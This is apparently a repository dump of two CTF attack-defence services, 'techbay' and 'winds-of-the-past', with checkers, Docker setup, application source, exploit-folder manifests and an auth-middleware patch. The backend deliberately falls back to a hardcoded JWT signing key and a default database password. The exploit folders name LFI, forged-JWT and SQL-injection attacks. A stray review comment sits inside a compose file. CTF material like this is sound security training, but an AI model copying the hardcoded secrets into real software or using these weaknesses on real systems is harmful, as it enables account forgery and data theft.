7 | command: localhost 1 ${TICK} 8 | network_mode: host 9 | -------------------------------------------------------------------------------- /techbay/checkers/checker1/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | Pillow -------------------------------------------------------------------------------- /techbay/checkers/checker2/.gitignore: -------------------------------------------------------------------------------- 1 | .idea 2 | -------------------------------------------------------------------------------- /techbay/checkers/checker2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY checker.py /checker/checker.py 10 | USER ctf-checkermaster 11 | ENV CTF_CHECKERSCRIPT /checker/checker.py 12 | 13 | # set this to _checker 14 | ENV CTF_SERVICE techbay_checker2 15 | -------------------------------------------------------------------------------- /techbay/checkers/checker2/README.md: -------------------------------------------------------------------------------- 1 | ### Building and running the checker 2 | 3 | Run the application (from `/dist`) 4 | ``` 5 | docker-compose up 6 | ``` 7 | 8 | Run the checker for one tick (from `/checker/checker1`) 9 | ``` 10 | TICK=0 docker-compose up 11 | ``` 12 | 13 | This will do the following: 14 | 15 | - call place_flag for the current tick 16 | - call check_service 17 | - call check_flag for up to 5 previous ticks (one invocation per tick) 18 | 19 | To test that checking previous ticks works, call the checker with increasing tick numbers: 20 | ``` 21 | TICK=1 docker-compose up # checked ticks: 0, 1 22 | TICK=2 docker-compose up # checked ticks: 0, 1, 2 23 | TICK=3 docker-compose up # checked ticks: 0, 1, 2, 3 24 | 
TICK=4 docker-compose up # checked ticks: 0, 1, 2, 3, 4 25 | TICK=5 docker-compose up # checked ticks: 0, 1, 2, 3, 4, 5 26 | TICK=6 docker-compose up # checked ticks: 1, 2, 3, 4, 5, 6 27 | ... 28 | ``` 29 | -------------------------------------------------------------------------------- /techbay/checkers/checker2/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | 4 | services: 5 | checker: 6 | build: . 7 | command: localhost 1 ${TICK} 8 | network_mode: host 9 | -------------------------------------------------------------------------------- /techbay/checkers/checker2/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | Pillow -------------------------------------------------------------------------------- /techbay/dist/README.md: -------------------------------------------------------------------------------- 1 | # techbay 2 | 3 | ## Flag IDs 4 | 5 | - Flagstore 1: the flag id correspond to the user id with flags 6 | - Flagstore 2: the flag id correspond to the user id with flags 7 | -------------------------------------------------------------------------------- /techbay/dist/backend-node/.dockerignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .idea 3 | docker -------------------------------------------------------------------------------- /techbay/dist/backend-node/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .idea 3 | build 4 | yarn-error.log -------------------------------------------------------------------------------- /techbay/dist/backend-node/docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:16 as builder 2 | 3 | WORKDIR /app 4 | 5 | COPY ./package.json . 6 | COPY ./yarn.lock . 
7 | 8 | RUN yarn install 9 | 10 | ADD tsconfig.json private.ke[y] ./ 11 | ADD src/ ./src/ 12 | 13 | RUN yarn run build 14 | 15 | FROM node:16 as runner 16 | 17 | WORKDIR /app 18 | 19 | COPY --from=builder /app/node_modules/ ./node_modules/ 20 | COPY --from=builder /app/build/ /app/private.ke[y] ./ 21 | 22 | RUN chown -R node:node /app 23 | 24 | USER node 25 | 26 | ENTRYPOINT ["node", "./index.js"] 27 | 28 | EXPOSE 8080 29 | -------------------------------------------------------------------------------- /techbay/dist/backend-node/src/config.ts: -------------------------------------------------------------------------------- 1 | import * as fs from "fs"; 2 | 3 | export const PRIVATE_KEY = fs.existsSync("private.key") ? fs.readFileSync("private.key", 'utf-8') : '53cr3t_k3y' -------------------------------------------------------------------------------- /techbay/dist/backend-node/src/db/index.ts: -------------------------------------------------------------------------------- 1 | import {Client} from "pg"; 2 | 3 | let connected = false; 4 | const client = new Client({ 5 | host: process.env.DB_HOST ?? 'localhost', 6 | port: parseInt(process.env.DB_PORT ?? '5432'), 7 | database: process.env.DB_NAME ?? 'techbay', 8 | user: process.env.DB_USER ?? 'postgres', 9 | password: process.env.DB_PASSWORD ?? 
'password', 10 | }); 11 | 12 | export async function getDbConnection() { 13 | if (!connected) { 14 | connected = true; 15 | await client.connect(); 16 | } 17 | return client; 18 | } -------------------------------------------------------------------------------- /techbay/dist/backend-node/src/index.ts: -------------------------------------------------------------------------------- 1 | import express, { Application } from "express"; 2 | import morgan from "morgan"; 3 | import ProfileController from "./controllers/profile.controller"; 4 | import RequestsController from "./controllers/requests.controller"; 5 | import TradingController from "./controllers/trading.controller"; 6 | import cors from "cors"; 7 | 8 | const app: Application = express(); 9 | 10 | app.use(cors()); 11 | 12 | app.use(express.json()); 13 | app.use(morgan("tiny")); 14 | 15 | app.use("/profile", ProfileController); 16 | app.use("/request", RequestsController); 17 | app.use("/offer", TradingController); 18 | 19 | app.listen(8080, () => { 20 | console.log("Server is running on port", 8080); 21 | }); 22 | -------------------------------------------------------------------------------- /techbay/dist/backend-node/src/types/helper.type.ts: -------------------------------------------------------------------------------- 1 | import express from "express"; 2 | import {UserInfo} from "./trading.type"; 3 | 4 | export type RequestWithToken = express.Request & {user: UserInfo}; -------------------------------------------------------------------------------- /techbay/dist/backend-node/src/types/request.type.ts: -------------------------------------------------------------------------------- 1 | export interface Request { 2 | id: number; 3 | userId: number; 4 | offerId: number; 5 | timestamp: Date; 6 | } 7 | 8 | export function requestFromDb(dbObject: any): Request { 9 | return { 10 | id: dbObject.id, 11 | userId: dbObject.user_id, 12 | offerId: dbObject.offer_id, 13 | timestamp: new Date(dbObject.timestamp), 14 
| } 15 | } -------------------------------------------------------------------------------- /techbay/dist/backend-node/src/types/trading.type.ts: -------------------------------------------------------------------------------- 1 | export interface NewOffer { 2 | name: string; 3 | description: string; 4 | picture: string | undefined; 5 | } 6 | 7 | export interface Offer { 8 | id: number; 9 | name: string; 10 | description: string; 11 | picture: string; 12 | timestamp: Date; 13 | isRequestedByMe: boolean; 14 | creator: UserInfo; 15 | owner: UserInfo | undefined; 16 | } 17 | 18 | export interface UserInfo { 19 | userId: number; 20 | username: string; 21 | displayname: string; 22 | } 23 | 24 | export interface PageConfig { 25 | page: number | undefined; 26 | nameOrder: Order | undefined; 27 | creationOrder: Order | undefined; 28 | limit: number | undefined; 29 | } 30 | 31 | export enum Order { 32 | ASC = 'asc', 33 | DESC = 'desc' 34 | } -------------------------------------------------------------------------------- /techbay/dist/backend-node/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "target": "es6", 4 | "module": "commonjs", 5 | "outDir": "./build", 6 | "strict": true, 7 | "esModuleInterop": true 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /techbay/dist/backend-rust/backend-rust: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/techbay/dist/backend-rust/backend-rust -------------------------------------------------------------------------------- /techbay/dist/backend-rust/docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04 2 | 3 | RUN apt update 4 | RUN apt install -y libpq-dev 5 | 6 | RUN groupadd ubuntu && useradd -g ubuntu -u 
1001 ubuntu 7 | 8 | WORKDIR /app 9 | 10 | ADD backend-rust private.ke[y] ./ 11 | RUN chmod +x backend-rust 12 | 13 | RUN mkdir /app/data 14 | 15 | RUN chown -R ubuntu:ubuntu /app 16 | 17 | USER ubuntu 18 | EXPOSE 3030 19 | 20 | ENTRYPOINT ["./backend-rust"] -------------------------------------------------------------------------------- /techbay/dist/database/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM postgres:14.5 2 | 3 | COPY schema.sql /docker-entrypoint-initdb.d/schema.sql 4 | 5 | USER postgres 6 | EXPOSE 5432 -------------------------------------------------------------------------------- /techbay/dist/frontend/.dockerignore: -------------------------------------------------------------------------------- 1 | .idea 2 | .vscode 3 | node_modules 4 | .gitignore -------------------------------------------------------------------------------- /techbay/dist/frontend/.eslintrc.cjs: -------------------------------------------------------------------------------- 1 | /* eslint-env node */ 2 | require("@rushstack/eslint-patch/modern-module-resolution"); 3 | 4 | module.exports = { 5 | "root": true, 6 | "extends": [ 7 | "plugin:vue/vue3-essential", 8 | "eslint:recommended", 9 | "@vue/eslint-config-typescript/recommended", 10 | "@vue/eslint-config-prettier" 11 | ] 12 | } 13 | -------------------------------------------------------------------------------- /techbay/dist/frontend/.gitignore: -------------------------------------------------------------------------------- 1 | # Logs 2 | logs 3 | *.log 4 | npm-debug.log* 5 | yarn-debug.log* 6 | yarn-error.log* 7 | pnpm-debug.log* 8 | lerna-debug.log* 9 | 10 | node_modules 11 | .DS_Store 12 | dist 13 | dist-ssr 14 | coverage 15 | *.local 16 | 17 | /cypress/videos/ 18 | /cypress/screenshots/ 19 | 20 | # Editor directories and files 21 | .vscode/* 22 | !.vscode/extensions.json 23 | .idea 24 | *.suo 25 | *.ntvs* 26 | *.njsproj 27 | *.sln 28 | *.sw? 
29 | 30 | typescript-fetch-client-generated.zip 31 | -------------------------------------------------------------------------------- /techbay/dist/frontend/.prettierrc: -------------------------------------------------------------------------------- 1 | {"printWidth":100,"tabWidth":2,"useTabs":false,"semi":true,"singleQuote":true,"trailingComma":"all","bracketSpacing":true,"jsxBracketSameLine":true} -------------------------------------------------------------------------------- /techbay/dist/frontend/.vscode/extensions.json: -------------------------------------------------------------------------------- 1 | { 2 | "recommendations": ["Vue.volar", "Vue.vscode-typescript-vue-plugin"] 3 | } 4 | -------------------------------------------------------------------------------- /techbay/dist/frontend/docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:16 as builder 2 | 3 | WORKDIR /app 4 | 5 | COPY ./package.json . 6 | COPY ./yarn.lock . 7 | 8 | RUN yarn install 9 | 10 | ADD index.html tsconfig.config.json tsconfig.json vite.config.ts env.d.ts ./ 11 | ADD src/ ./src/ 12 | ADD public/ ./public/ 13 | 14 | RUN yarn run build 15 | 16 | FROM alpine:3.16.2 17 | 18 | RUN apk add thttpd 19 | 20 | RUN adduser -D static 21 | WORKDIR /home/static 22 | 23 | COPY --from=builder /app/dist/ . 
24 | 25 | RUN chown -R static:static /home/static 26 | 27 | USER static 28 | 29 | CMD ["thttpd", "-D", "-h", "0.0.0.0", "-p", "8080", "-d", "/home/static", "-u", "static", "-l", "-", "-M", "60"] 30 | 31 | EXPOSE 8080 32 | -------------------------------------------------------------------------------- /techbay/dist/frontend/env.d.ts: -------------------------------------------------------------------------------- 1 | /// 2 | -------------------------------------------------------------------------------- /techbay/dist/frontend/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | Techbay 11 | 12 | 13 |
14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /techbay/dist/frontend/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/techbay/dist/frontend/public/favicon.ico -------------------------------------------------------------------------------- /techbay/dist/frontend/src/api/generated/.gitignore: -------------------------------------------------------------------------------- 1 | wwwroot/*.js 2 | node_modules 3 | typings 4 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/api/generated/.swagger-codegen/VERSION: -------------------------------------------------------------------------------- 1 | 2.4.27 -------------------------------------------------------------------------------- /techbay/dist/frontend/src/api/generated/custom.d.ts: -------------------------------------------------------------------------------- 1 | declare module 'portable-fetch'; 2 | declare module 'url'; -------------------------------------------------------------------------------- /techbay/dist/frontend/src/api/generated/index.ts: -------------------------------------------------------------------------------- 1 | // tslint:disable 2 | /** 3 | * TechBay 4 | * No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) 5 | * 6 | * OpenAPI spec version: 1.0.0 7 | * 8 | * 9 | * NOTE: This class is auto generated by the swagger code generator program. 10 | * https://github.com/swagger-api/swagger-codegen.git 11 | * Do not edit the class manually. 
12 | */ 13 | 14 | 15 | export * from "./api"; 16 | export * from "./configuration"; 17 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/assets/logo.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/assets/techbay-logo.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/techbay/dist/frontend/src/assets/techbay-logo.ico -------------------------------------------------------------------------------- /techbay/dist/frontend/src/assets/techbay.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/techbay/dist/frontend/src/assets/techbay.jpg -------------------------------------------------------------------------------- /techbay/dist/frontend/src/components/Spinner.vue: -------------------------------------------------------------------------------- 1 | 2 | 3 | 8 | 9 | 23 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/main.ts: -------------------------------------------------------------------------------- 1 | import { createApp } from 'vue'; 2 | import App from './App.vue'; 3 | import router from './router'; 4 | import Equal from 'equal-vue'; 5 | import 'equal-vue/dist/style.css'; 6 | 7 | const app = createApp(App).use(Equal); 8 | 9 | app.use(router); 10 | 11 | app.mount('#app'); 12 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/services/authentication.service.ts: -------------------------------------------------------------------------------- 1 | import { authenticationApi } from 
'@/api'; 2 | import type { UserInfo } from '@/api/generated'; 3 | import { sha3_512 } from 'js-sha3'; 4 | 5 | export async function login(username: string, password: string): Promise { 6 | const hashedPassword = sha3_512(password); 7 | return authenticationApi().login({ username, hashedPassword }); 8 | } 9 | 10 | export async function register( 11 | username: string, 12 | password: string, 13 | passport: string, 14 | ): Promise { 15 | const hashedPassword = sha3_512(password); 16 | await authenticationApi().register({ 17 | username: username, 18 | hashedPassword: hashedPassword, 19 | passport, 20 | }); 21 | } 22 | 23 | export async function getCurrentUser(): Promise { 24 | return authenticationApi().getCurrentUser(); 25 | } 26 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/services/index.ts: -------------------------------------------------------------------------------- 1 | import * as authenticationService from './authentication.service'; 2 | import * as profileService from './profile.service'; 3 | import * as requestService from './request.service'; 4 | import * as tradingService from './trading.service'; 5 | import * as spinnerService from './spinner.service'; 6 | 7 | export const AuthenticationService = authenticationService; 8 | export const ProfileService = profileService; 9 | export const RequestService = requestService; 10 | export const TradingService = tradingService; 11 | export const SpinnerService = spinnerService; 12 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/services/message-service.ts: -------------------------------------------------------------------------------- 1 | export interface MessageService { 2 | danger: (options: { text: string; duration: number }) => void; 3 | success: (options: { text: string; duration: number }) => void; 4 | primary: (options: { text: string; duration: number }) => void; 5 | warning: 
(options: { text: string; duration: number }) => void; 6 | } 7 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/services/profile.service.ts: -------------------------------------------------------------------------------- 1 | import { profileApi } from '@/api'; 2 | import type { ProfileInfo, ProfileInfoCurrentUser } from '@/api/generated'; 3 | 4 | export async function getProfileOfCurrentUser(): Promise { 5 | return profileApi().getProfile(); 6 | } 7 | 8 | export async function getProfile(userId: number): Promise { 9 | return profileApi().getProfileByUserId(userId); 10 | } 11 | 12 | export async function updateProfile(profileInfo: ProfileInfoCurrentUser): Promise { 13 | await profileApi().updateProfile(profileInfo); 14 | } 15 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/services/request.service.ts: -------------------------------------------------------------------------------- 1 | import { requestApi } from '@/api'; 2 | import type { Request } from '@/api/generated'; 3 | 4 | export async function getRequestsByOthers(): Promise { 5 | return requestApi().getRequestsByOthers(); 6 | } 7 | 8 | export async function getRequestsByMe(): Promise { 9 | return requestApi().getRequestsByMe(); 10 | } 11 | 12 | export async function requestOffer(offerId: number): Promise { 13 | await requestApi().requestOffer(offerId); 14 | } 15 | 16 | export async function acceptRequest(id: number): Promise { 17 | await requestApi().acceptRequest(id); 18 | } 19 | 20 | export async function takebackRequest(id: number): Promise { 21 | await requestApi().takebackRequest(id); 22 | } 23 | 24 | export async function denyRequest(id: number): Promise { 25 | await requestApi().denyRequest(id); 26 | } 27 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/services/spinner.service.ts: 
-------------------------------------------------------------------------------- 1 | export function hide() { 2 | document.querySelector('div.spinner-background')?.setAttribute('style', 'display: none'); 3 | } 4 | 5 | export function show() { 6 | document.querySelector('div.spinner-background')?.removeAttribute('style'); 7 | } 8 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/services/time.service.ts: -------------------------------------------------------------------------------- 1 | export function dateToDifferenceString(timestamp: Date): string { 2 | const currentDate = new Date(); 3 | const diff = (currentDate.getTime() - timestamp.getTime()) / 1000; 4 | if (diff < 60) { 5 | return `${diff.toFixed(0)} s ago`; 6 | } else if (diff < 60 * 60) { 7 | return `${(diff / 60).toFixed(0)} m ago`; 8 | } else if (diff < 60 * 60 * 60) { 9 | return `${(diff / 60 / 60).toFixed(0)} h ago`; 10 | } else if (diff < 60 * 60 * 60 * 24) { 11 | return `${(diff / 60 / 60 / 60).toFixed(0)} d ago`; 12 | } 13 | return `long ago`; 14 | } 15 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/stores/user-store.ts: -------------------------------------------------------------------------------- 1 | import { reactive } from 'vue'; 2 | import type { UserInfo } from '@/api/generated'; 3 | 4 | interface UserStoreData { 5 | user: UserInfo | undefined; 6 | isLoggedIn: boolean; 7 | token: string | undefined; 8 | } 9 | 10 | export const userStore = reactive({ 11 | user: undefined, 12 | isLoggedIn: false, 13 | token: undefined, 14 | }); 15 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/views/AdminView.vue: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | -------------------------------------------------------------------------------- 
/techbay/dist/frontend/src/views/MyRequestsView.vue: -------------------------------------------------------------------------------- 1 | 12 | 13 | 16 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/views/RequestsView.vue: -------------------------------------------------------------------------------- 1 | 12 | 13 | 16 | -------------------------------------------------------------------------------- /techbay/dist/frontend/tsconfig.config.json: -------------------------------------------------------------------------------- 1 | { 2 | "extends": "@vue/tsconfig/tsconfig.node.json", 3 | "include": ["vite.config.*", "vitest.config.*", "cypress.config.*"], 4 | "compilerOptions": { 5 | "composite": true, 6 | "types": ["node"] 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /techbay/dist/frontend/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "extends": "@vue/tsconfig/tsconfig.web.json", 3 | "include": ["env.d.ts", "src/**/*", "src/**/*.vue"], 4 | "compilerOptions": { 5 | "baseUrl": ".", 6 | "paths": { 7 | "@/*": ["./src/*"] 8 | }, 9 | "strictPropertyInitialization": false 10 | }, 11 | 12 | "references": [ 13 | { 14 | "path": "./tsconfig.config.json" 15 | } 16 | ] 17 | } 18 | -------------------------------------------------------------------------------- /techbay/dist/frontend/vite.config.ts: -------------------------------------------------------------------------------- 1 | import { fileURLToPath, URL } from 'url' 2 | 3 | import { defineConfig } from 'vite' 4 | import vue from '@vitejs/plugin-vue' 5 | 6 | // https://vitejs.dev/config/ 7 | export default defineConfig({ 8 | plugins: [vue()], 9 | resolve: { 10 | alias: { 11 | '@': fileURLToPath(new URL('./src', import.meta.url)) 12 | } 13 | } 14 | }) 15 | -------------------------------------------------------------------------------- 
/techbay/dist/proxy/Caddyfile: -------------------------------------------------------------------------------- 1 | :8080 2 | log 3 | 4 | reverse_proxy techbay-frontend:8080 5 | 6 | reverse_proxy /offer techbay-backend-node:8080 7 | reverse_proxy /offer/* techbay-backend-node:8080 8 | 9 | reverse_proxy /profile techbay-backend-node:8080 10 | reverse_proxy /profile/* techbay-backend-node:8080 11 | 12 | reverse_proxy /request techbay-backend-node:8080 13 | reverse_proxy /request/* techbay-backend-node:8080 14 | 15 | handle_path /auth/* { 16 | rewrite * /api/auth{path} 17 | reverse_proxy techbay-backend-rust:3030 18 | } 19 | -------------------------------------------------------------------------------- /techbay/dist/proxy/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM caddy:2-alpine 2 | COPY Caddyfile /etc/caddy/Caddyfile 3 | RUN adduser caddy -H -D 4 | USER caddy 5 | CMD ["caddy", "run", "--config", "/etc/caddy/Caddyfile", "--adapter", "caddyfile"] 6 | -------------------------------------------------------------------------------- /techbay/exploits/.gitignore: -------------------------------------------------------------------------------- 1 | .idea -------------------------------------------------------------------------------- /techbay/exploits/flagstore1/exploit-hidden-lfi/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | pytesseract 3 | Pillow -------------------------------------------------------------------------------- /techbay/exploits/flagstore1/exploit-jwt-known-private-key/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | pytesseract 3 | pyjwt 4 | Pillow -------------------------------------------------------------------------------- /techbay/exploits/flagstore2/exploit-hidden-api/requirements.txt: 
-------------------------------------------------------------------------------- 1 | requests -------------------------------------------------------------------------------- /techbay/exploits/flagstore2/exploit-jwt-known-private-key/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules -------------------------------------------------------------------------------- /techbay/exploits/flagstore2/exploit-jwt-known-private-key/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "main": "exploit.js", 3 | "dependencies": { 4 | "jsonwebtoken": "^8.5.1", 5 | "node-fetch": "v2" 6 | }, 7 | "name": "exploit1-flagstore2", 8 | "version": "1.0.0", 9 | "license": "MIT", 10 | "private": true 11 | } 12 | -------------------------------------------------------------------------------- /techbay/exploits/flagstore2/exploit-sqli/requirements.txt: -------------------------------------------------------------------------------- 1 | requests -------------------------------------------------------------------------------- /techbay/meta.env: -------------------------------------------------------------------------------- 1 | SERVICE_NAME=techbay 2 | -------------------------------------------------------------------------------- /techbay/patches/flagstore2-vulnerability1.patch: --------------------------------------------------------------------------------
1 | diff --git a/backend-node/src/controllers/profile.controller.ts b/backend-node/src/controllers/profile.controller.ts
2 | index 8d13990..36ba0e4 100644
3 | --- a/backend-node/src/controllers/profile.controller.ts
4 | +++ b/backend-node/src/controllers/profile.controller.ts
5 |
@@ -51,7 +51,7 @@ controller.post(
6 |
7 | controller.post(
8 | "/status/visbility",
9 | - authMiddleware2,
10 | + authMiddleware,
11 | body('visibility').isBoolean(),
12 | async (req, res) => {
13 | if (!validationResult(req).isEmpty()) {
14 | -------------------------------------------------------------------------------- /techbay/techbay.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/techbay/techbay.png -------------------------------------------------------------------------------- /winds-of-the-past/.gitignore: -------------------------------------------------------------------------------- 1 | dist/src/build 2 | -------------------------------------------------------------------------------- /winds-of-the-past/checkers/checker1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY checker.py /checker/checker.py 10 | USER ctf-checkermaster 11 | ENV CTF_CHECKERSCRIPT /checker/checker.py 12 | 13 | # set this to _checker 14 | ENV CTF_SERVICE winds-of-the-past_checker1 15 | -------------------------------------------------------------------------------- /winds-of-the-past/checkers/checker1/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | checkerstate: 5 | 6 | services: 7 | checker: 8 | build: . 
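Review bot: `authMiddleware2` is only swapped out on the `/status/visbility` route here, and nothing visible in the hunk removes it, so the same weaker guard can still sit on a neighbouring route or be re-attached later. Its definition and the other `controller.post` registrations are outside the hunk; going by the patch name I am assuming it accepts requests that `authMiddleware` rejects, and if that holds it should be deleted, or renamed so its narrower purpose is obvious, once every remaining use has been checked. I would also put a comment above the middleware line, `// must be authMiddleware: this route changes the caller's profile state`, and add a regression test asserting that a POST without valid credentials is rejected before the handler runs. The handler body continues past the end of the hunk, so how `visibility` is used after `isBoolean()` cannot be judged from here.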
9 | command: localhost 1 ${TICK} # ip, team, tick 10 | network_mode: host 11 | volumes: 12 | - checkerstate:/tmp 13 | -------------------------------------------------------------------------------- /winds-of-the-past/checkers/checker1/requirements.txt: -------------------------------------------------------------------------------- 1 | pwntools 2 | -------------------------------------------------------------------------------- /winds-of-the-past/checkers/checker2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN apt-get update && apt-get install --yes --no-install-recommends \ 4 | gfortran 5 | 6 | RUN mkdir -p /checker 7 | WORKDIR /checker 8 | 9 | COPY requirements.txt /checker/requirements.txt 10 | RUN pip install -r requirements.txt 11 | 12 | COPY checksum.f /checker/checksum.f 13 | RUN gfortran /checker/checksum.f -fdec-structure -o /checker/checksum 14 | 15 | COPY checker.py /checker/checker.py 16 | 17 | USER ctf-checkermaster 18 | ENV CTF_CHECKERSCRIPT /checker/checker.py 19 | 20 | # set this to _checker 21 | ENV CTF_SERVICE winds-of-the-past_checker2 22 | -------------------------------------------------------------------------------- /winds-of-the-past/checkers/checker2/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | checkerstate: 5 | 6 | networks: 7 | gamenet: 8 | external: 9 | name: gamenet 10 | 11 | services: 12 | checker: 13 | build: . 
14 | command: localhost 1 ${TICK} # ip, team, tick 15 | network_mode: host 16 | volumes: 17 | - checkerstate:/tmp 18 | -------------------------------------------------------------------------------- /winds-of-the-past/checkers/checker2/requirements.txt: -------------------------------------------------------------------------------- 1 | pwntools 2 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04 as builder 2 | RUN apt-get update && apt-get install --yes --no-install-recommends \ 3 | cmake \ 4 | gfortran \ 5 | make 6 | 7 | RUN mkdir /src /build 8 | 9 | COPY src /src 10 | RUN cd /src/deps/fortran-unix && \ 11 | make clean linux 12 | RUN cd /build && \ 13 | cmake /src -DFORTRAN_UNIX_DIR=/src/deps/fortran-unix && \ 14 | make 15 | 16 | FROM ubuntu:20.04 17 | COPY run.sh /run.sh 18 | COPY cleanup-cron /etc/cron.d/cleanup-cron 19 | RUN apt-get update && \ 20 | apt-get install --yes --no-install-recommends \ 21 | cron \ 22 | libgfortran5 \ 23 | socat && \ 24 | useradd service && \ 25 | chmod u+s /usr/sbin/cron && \ 26 | crontab -u service /etc/cron.d/cleanup-cron && \ 27 | mkdir -p /data && \ 28 | chown service:service /data 29 | 30 | USER service 31 | COPY --from=builder /build/winds_of_the_past /service 32 | CMD /run.sh 33 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/README.md: -------------------------------------------------------------------------------- 1 | # Winds of the Past 2 | 3 | ## Flag IDs 4 | 5 | - Flagstore 1: the flag id corresponds to a username with a flag 6 | - Flagstore 2: the flag id identifies a turbine with a flag 7 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/cleanup-cron: -------------------------------------------------------------------------------- 1 | 
# Delete files not accessed for >30 minutes 2 | */5 * * * * /usr/bin/find /data -amin +30 -delete 3 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | data: 5 | 6 | services: 7 | winds-of-the-past: 8 | build: . 9 | user: service 10 | restart: always 11 | ports: 12 | - 10060:10060 13 | volumes: 14 | - data:/data 15 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/run.sh: -------------------------------------------------------------------------------- 1 | cron 2 | socat -T180 tcp-l:10060,reuseaddr,fork EXEC:/service,pty,stderr,echo=0 3 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0) 2 | project(winds_of_the_past Fortran) 3 | enable_language(Fortran) 4 | 5 | set(CMAKE_Fortran_FLAGS "-fdec-structure -Wall -fno-backtrace -fimplicit-none -no-pie") 6 | set(FORTRAN_UNIX_DIR "" CACHE STRING "Directory containing the fortran-unix dependency") 7 | 8 | add_executable(${PROJECT_NAME} 9 | main.f 10 | mod_bucket.f 11 | mod_crypto.f 12 | mod_consumption.f 13 | mod_turbine.f 14 | mod_user.f 15 | ) 16 | 17 | target_link_libraries(${PROJECT_NAME} 18 | "${FORTRAN_UNIX_DIR}/libfortran-unix.a" 19 | ) 20 | include_directories(${FORTRAN_UNIX_DIR}) 21 | 22 | set_target_properties(${PROJECT_NAME} PROPERTIES LINKER_LANGUAGE Fortran) 23 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/deps/fortran-unix/.gitignore: -------------------------------------------------------------------------------- 1 | # Distribution / packaging 2 | .xmake/ 3 | env/ 4 | build/ 5 | dist/ 6 | var/ 7 | 8 | # 
